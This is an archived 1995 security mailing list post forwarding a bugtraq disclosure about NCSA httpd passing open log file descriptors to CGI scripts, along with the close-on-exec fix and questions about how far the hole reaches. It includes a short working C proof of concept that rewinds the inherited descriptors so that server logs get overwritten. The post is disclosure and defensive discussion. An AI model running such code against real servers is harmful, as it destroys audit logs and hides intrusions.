NCSA httpd again: CGI scripts and log file descriptors

To: www-security@ns2.rutgers.edu
Subject: NCSA httpd again: CGI scripts and log file descriptors
From: riddle@is.rice.edu (Prentiss Riddle)
Date: Thu, 4 May 1995 10:13:49 -0500 (CDT)
Cc: paulp@cerf.net, httpd@ncsa.uiuc.edu

This is from the "bugtraq" list (see
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.htm#2616 and
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.htm#2742 for a couple of
httpd-related threads).

Would anyone care to comment on Phillips' speculation as to whether
this hole could do more than trash your logs?

Furthermore, assuming you have tight restrictions on the CGI scripts
you make available, is there any reason to believe that this could be
exploited by malicious *users* (as opposed to malicious CGI authors)?

-- Prentiss Riddle ("aprendiz de todo, maestro de nada") riddle@rice.edu
-- Systems Programmer and RiceInfo Administrator, Rice University
-- 2002-A Guadalupe St. #285, Austin, TX 78705 / 512-323-0708
--------------------------------------------------------------------------

On Apr 26, 11:43pm, Paul Phillips (paulp@CERF.NET) wrote:
} Subject: CGI script insecurity in NCSA httpd
}
} Greetings, all.  Anyone with access to CGI scripts on your server can
} destroy all your logfiles and possible wreak other havoc.  The problem
} is that NCSA httpd does not close open file descriptors on exec, so
} CGI scripts still have access to all the originals.  If you need a 
} demonstration, run the following as a CGI on your server:
} 
} #include <errno.h>
} #include <sys/types.h>
} #include <unistd.h>
} 
} #define OPEN_MAX 255	/* good enough :-) */
} 
} int main(int argc, char ** argv)
} {
}     int i;
} 
}     printf("Content-type: text/plain\n\n");
} 
}     for(i = 0; i < OPEN_MAX; i++) {
}         if(lseek(i, 0, SEEK_SET) != -1 || errno != EBADF)
}             printf("I just reset fd %d.  Ha!\n", i);
}     }
} }
} 
} Please note that this will reset all your logfiles to the beginning,
} causing new data to overwrite old data.  Other, equally entertaining
} things can be done with these open file descriptors.  The fix is to
} set the close-on-exec flag whenever a new file descriptor is allocated,
} especially when the log files are opened, as in
} 
}     fcntl(fd, F_SETFD, FD_CLOEXEC);
} 
} Since these file descriptors are open to root owned files, I pondered
} whether cracking root was possible.  It does not appear so, since fchmod
} checks the euid of the process even though it has an open descriptor,
} and this is normally "nobody".  HOWEVER, I have not given the matter an 
} enormous amount of thought, so a greater vulnerability may exist here.
} I welcome comments.
} 
} --
} Paul Phillips                                 EMAIL: paulp@cerf.net  
} WWW: http://www.primus.com/staff/paulp/       PHONE: (619) 220-0850
} 
} 
}-- End of excerpt from Paul Phillips

Follow-Ups:

Re: NCSA httpd again: CGI scripts and log file descriptors

From: Paul Phillips <paulp@cerf.net>

Previous: Re: Credit Card Security
Next: Re: NCSA httpd again: CGI scripts and log file descriptors
Index(es):
- Index
- Thread